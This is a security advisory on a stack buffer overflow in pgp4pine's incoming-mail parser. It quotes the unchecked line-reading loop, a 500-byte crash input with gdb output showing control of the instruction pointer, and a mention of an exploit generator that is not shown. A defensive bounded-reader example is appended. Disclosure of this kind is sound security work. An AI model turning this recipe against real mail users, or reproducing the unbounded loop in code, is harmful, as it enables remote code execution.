COMMAND

    pgp4pine stack overflow vulnerability

SYSTEMS AFFECTED

    current ?

PROBLEM

    Eric Auge [eric.auge@cw.com] found :

    I  Background:

    pgp4pine is a mail encryption/decryption/signature/verification wrapper
    to gpg for pine. It is called from pine to parse the mail body and get
    PGP information from the file.

    More information: http://pgp4pine.flatline.de/

    II  Problem description:

    When installed/configured within pine, pgp4pine parses any incoming mail
    before reading (in the default standard configuration), looking for PGP
    tokens and information to do its sender's signature verification.

    To verify incoming mail it calls:

        menus.c: void fileVerifyDecryptMenu(char *inFile,char *outFile);

    and reads each line according to this loop:

        [...]
        char readline[CONSOLE_IO_LINE_LENGTH];
        (where defines.h: #define CONSOLE_IO_LINE_LENGTH 256)
        [...]
        do {
            fertig=0;
            while (!fertig) {
                if ((c=getc(fin))==EOF) {
                    outFile=inFile;
                    /* this usually is not executed, EOF breaks directly */
                    return;
                } else if ((readline[i++]=c) == '\n') {
                    readline[i]='\0';
                    fertig=1;
                }
            }
            fertig=0;
            if (strncmp("-----BEGIN PGP SIGNED",readline,20)==0) {
                /* got signed message */
                fclose(fin);
                while (fileVerify(inFile,outFile) > 0); /* =1: Repeat */
                fertig=1;
            } else if (strncmp("-----BEGIN PGP",readline,14)==0) {
                /* got another type of PGP message (encrypted, keys ...) */
                fclose(fin);
                fileDecrypt(inFile,outFile);
                waitForReturn();
                fertig=1;
            } else i=0; /* Got waste line, reset i */
        } while (!fertig);
        [...]

    If a single line goes over 256 chars directly to EOF, it will overwrite
    the saved environment on the stack and return, since there is no check
    on the index 'i' within the readline[] array:

        [...]
        } else if ((readline[i++]=c) == '\n') {
        [...]

    You can go over CONSOLE_IO_LINE_LENGTH and replace the necessary saved
    registers before hitting one condition to return:

        [...]
        if ((c=getc(fin))==EOF) {
            outFile=inFile;
            /* this usually is not executed, EOF breaks directly */
            return;
        }
        [...]
    Then try:

        rival@bones ~/dev/test/pgp4pine-ex $ echo `perl -e 'print "A"x500'` > testmail
        rival@bones ~/dev/test/pgp4pine-ex $ ./pgp4pine-vuln -d -i testmail
        [...]
        Segmentation fault (core dumped)
        rival@bones ~/dev/test/pgp4pine-ex $ gdb ./pgp4pine-vuln core
        [...]
        Core was generated by `./pgp4pine-vuln -d -i testmail'.
        Program terminated with signal 11, Segmentation fault.
        Reading symbols from /lib/libc.so.6...done.
        Loaded symbols for /lib/libc.so.6
        Reading symbols from /lib/ld-linux.so.2...done.
        Loaded symbols for /lib/ld-linux.so.2
        #0  0x41414141 in ?? ()
        (gdb)

    Here it is ;)

    [attachment: mailex-gen.c]
    III  Impact

    Since pgp4pine processes any incoming email, sending a specially crafted
    email can let the sender execute arbitrary code on the recipient's box
    when the mail is opened.

SOLUTION

    ?
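As an added example (not pgp4pine's code), the same scanning loop with the missing bound on 'i': bytes that do not fit in readline[] are consumed and dropped instead of written, and a truncated line is skipped as a waste line. The function names, the enum and the tmpfile() harness are assumptions made here; only CONSOLE_IO_LINE_LENGTH, the armor markers and the 500-byte trigger come from the advisory.

```c
#include <stdio.h>
#include <string.h>

#define CONSOLE_IO_LINE_LENGTH 256   /* same size pgp4pine uses in defines.h */
enum scan_result { SCAN_NONE, SCAN_SIGNED, SCAN_OTHER_PGP };

/* Bounded version of the readline[i++] loop: bytes that do not fit are read and
 * dropped so 'i' never passes the array. Returns 0 at EOF, 1 if fit, -1 if cut. */
static int read_line_bounded(FILE *fin, char *buf, size_t cap)
{
    size_t i = 0;
    int c, truncated = 0;
    while ((c = getc(fin)) != EOF && c != '\n') {
        if (i < cap - 1) buf[i++] = (char)c;
        else truncated = 1;              /* overlong: drop the byte, never write */
    }
    buf[i] = '\0';
    return (c == EOF && i == 0) ? 0 : (truncated ? -1 : 1);
}

/* First armor header, found as fileVerifyDecryptMenu() does; the constructed body
 * goes through tmpfile() because pgp4pine reads with getc(). Cut lines are waste. */
static enum scan_result scan_body(const char *body)
{
    char readline[CONSOLE_IO_LINE_LENGTH];
    enum scan_result r = SCAN_NONE;
    int n;
    FILE *fin = tmpfile();
    if (fin == NULL) return r;
    fputs(body, fin); rewind(fin);
    while ((n = read_line_bounded(fin, readline, sizeof readline)) != 0) {
        if (n < 0) continue;
        if (strncmp("-----BEGIN PGP SIGNED", readline, 21) == 0) { r = SCAN_SIGNED; break; }
        if (strncmp("-----BEGIN PGP", readline, 14) == 0) { r = SCAN_OTHER_PGP; break; }
    }
    fclose(fin);
    return r;
}

/* Replay the advisory's trigger (500 'A's, no newline, then EOF), then the same
 * line followed by a real header: expect SCAN_NONE, then SCAN_SIGNED, no crash. */
static int overlong_lines_handled(void)
{
    char body[560];
    memset(body, 'A', 500); body[500] = '\0';
    if (scan_body(body) != SCAN_NONE) return 0;
    strcpy(body + 500, "\n-----BEGIN PGP SIGNED MESSAGE-----\n");
    return scan_body(body) == SCAN_SIGNED;
}
```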